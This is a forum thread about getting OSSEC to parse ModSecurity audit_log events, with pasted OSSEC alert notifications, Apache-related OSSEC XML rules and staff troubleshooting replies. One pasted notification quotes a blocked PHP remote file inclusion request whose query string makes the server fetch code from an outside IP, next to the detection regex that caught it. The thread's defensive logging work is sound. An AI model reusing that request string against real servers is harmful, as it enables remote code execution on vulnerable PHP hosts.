Ossec Log Format for audit_log?

Community support forums for the free/delayed modsecurity rules feed. There is no such thing as a bad question here as long as it pertains to using the delayed modsecurity rules feed. Newbies feel free to get help getting started or asking questions that may be obvious.
webwzrd
Forum User
Forum User
Posts: 6
Joined: Wed Sep 18, 2013 10:46 am
Location: Minnesota

Ossec Log Format for audit_log?

Unread post by webwzrd »

I've searched and searched but can't seem to find the correct log format to use for monitoring audit_log with Ossec.

<localfile>
<log_format>apache</log_format>
<location>/var/log/httpd/audit_log</location>
</localfile>

I've tried apache and syslog, but they only fire off Rule: 1002 and not the ModSecurity rules. What do I need for this to work?
scott
Atomicorp Staff - Site Admin
Atomicorp Staff - Site Admin
Posts: 8355
Joined: Wed Dec 31, 1969 8:00 pm
Location: earth
Contact:

Re: Ossec Log Format for audit_log?

Unread post by scott »

Make sure you use the mod_security from the atomic or asl channel, it writes the logs in the correct format.
webwzrd
Forum User
Forum User
Posts: 6
Joined: Wed Sep 18, 2013 10:46 am
Location: Minnesota

Re: Ossec Log Format for audit_log?

Unread post by webwzrd »

scott wrote:Make sure you use the mod_security from the atomic or asl channel, it writes the logs in the correct format.
Thanks, I am.
webwzrd
Forum User
Forum User
Posts: 6
Joined: Wed Sep 18, 2013 10:46 am
Location: Minnesota

Re: Ossec Log Format for audit_log?

Unread post by webwzrd »

Is "apache" the correct log format?

This is what I get reported in Ossec notifications:

OSSEC HIDS Notification.
2013 Sep 19 09:07:53

Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

[modsecurity] [client 173.54.19.213] [domain private.com] [403] [/20130919/20130919-0907/20130919-090751-UjsFN0E8MfIAAD2WOhQAAAAh] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "508"] [id "340165"] [rev "279"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/index.php?-dsafe_mode=off -ddisable_functions=null -dallow_url_fopen=on -dallow_url_include=on -dauto_prepend_file=http://61.19.253.26/echo.txt"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)://" at REQUEST_URI.



--END OF NOTIFICATION



OSSEC HIDS Notification.
2013 Sep 19 09:08:01

Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

[modsecurity] [client 117.26.202.193] [domain private.com] [403] [/20130919/20130919-0908/20130919-090800-UjsFQEE8MfIAAD2LMXQAAAAc] [file "/etc/httpd/modsecurity.d/20_asl_useragents.conf"] [line "265"] [id "309925"] [rev "4"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Suspicious User-Agent, parenthesis closed with a semicolon Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)"] Access denied with code 403 (phase 2). Match of "rx (Qualidator\\.com|ExaleadCloudView|^Mozilla/4\\.0 \\(compatible;\\)$|UTVDriveBot)" against "REQUEST_HEADERS:User-Agent" required.



--END OF NOTIFICATION
User avatar
mikeshinn
Atomicorp Staff - Site Admin
Atomicorp Staff - Site Admin
Posts: 4149
Joined: Thu Feb 07, 2008 7:49 pm
Location: Chantilly, VA

Re: Ossec Log Format for audit_log?

Unread post by mikeshinn »

Yes, "apache" is correct. This error:

Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."

Means your ossec rules dont have rules to parse or understand the modsecurity log events, so you'll also have to create ossec rules to detect and parse them (pull out IP addresses, etc.).

Or you can use ASL. ASL includes our custom ossec rules for each of our modsecurity rules, giving you both fine grained control over how each modsecurity rule is treated by ossec, and the ability for ossec to do deep event, attack type and vulnerability type correlation of the modsecurity events with other events on the system.
webwzrd
Forum User
Forum User
Posts: 6
Joined: Wed Sep 18, 2013 10:46 am
Location: Minnesota

Re: Ossec Log Format for audit_log?

Unread post by webwzrd »

Here are the mod_security rules included in my apache_rules.xml:

<!-- Mod security rules by <ossec ( at ) sioban.net -->
<rule id="30118" level="6">
<if_sid>30101</if_sid>
<match>mod_security: Access denied|ModSecurity: Access denied</match>
<description>Access attempt blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>

<rule id="30119" level="12" frequency="6" timeframe="120">
<if_matched_sid>30118</if_matched_sid>
<same_source_ip />
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>

<rule id="30120" level="12">
<if_sid>30101</if_sid>
<match>Resource temporarily unavailable:</match>
<description>Apache without resources to run.</description>
<group>service_availability,</group>
</rule>

<rule id="30200" level="6" noalert="1">
<match>^mod_security-message: </match>
<description>Modsecurity alert.</description>
</rule>

<rule id="30201" level="6">
<if_sid>30200</if_sid>
<match>^mod_security-message: Access denied </match>
<description>Modsecurity access denied.</description>
<group>access_denied,</group>
</rule>

<rule id="30202" level="10" frequency="8" timeframe="120">
<if_matched_sid>30201</if_matched_sid>
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>
webwzrd
Forum User
Forum User
Posts: 6
Joined: Wed Sep 18, 2013 10:46 am
Location: Minnesota

Re: Ossec Log Format for audit_log?

Unread post by webwzrd »

After reviewing the rules I just posted, the match phrases seem to be incorrect for the way audit_log has things worded.

Do I have the wrong Ossec rules or the wrong audit_log format?
User avatar
mikeshinn
Atomicorp Staff - Site Admin
Atomicorp Staff - Site Admin
Posts: 4149
Joined: Thu Feb 07, 2008 7:49 pm
Location: Chantilly, VA

Re: Ossec Log Format for audit_log?

Unread post by mikeshinn »

Wrong or old ossec rules.
webwzrd
Forum User
Forum User
Posts: 6
Joined: Wed Sep 18, 2013 10:46 am
Location: Minnesota

Re: Ossec Log Format for audit_log?

Unread post by webwzrd »

I have the latest Ossec 2.7 with rules installed from ossec.net. They do list getting it directly from the AtomiCorp repository, however my monitoring server is an AWS and not compatible with "RPMs for RHEL, CentOS, Fedora and others". I used Server 2.7 – Linux/BSD download instead.

http://www.ossec.net/?page_id=19

Would that make a difference?
User avatar
mikeshinn
Atomicorp Staff - Site Admin
Atomicorp Staff - Site Admin
Posts: 4149
Joined: Thu Feb 07, 2008 7:49 pm
Location: Chantilly, VA

Re: Ossec Log Format for audit_log?

Unread post by mikeshinn »

It certainly could. The other problem you're going to have with the ossec rules you posted is that they dont recognized modsecurity levels, and will treat all modsecurity events the same. Which means you'll also end up blocking lower level rules (suspicious or just informational rules, as opposed to actual attacks).
Post Reply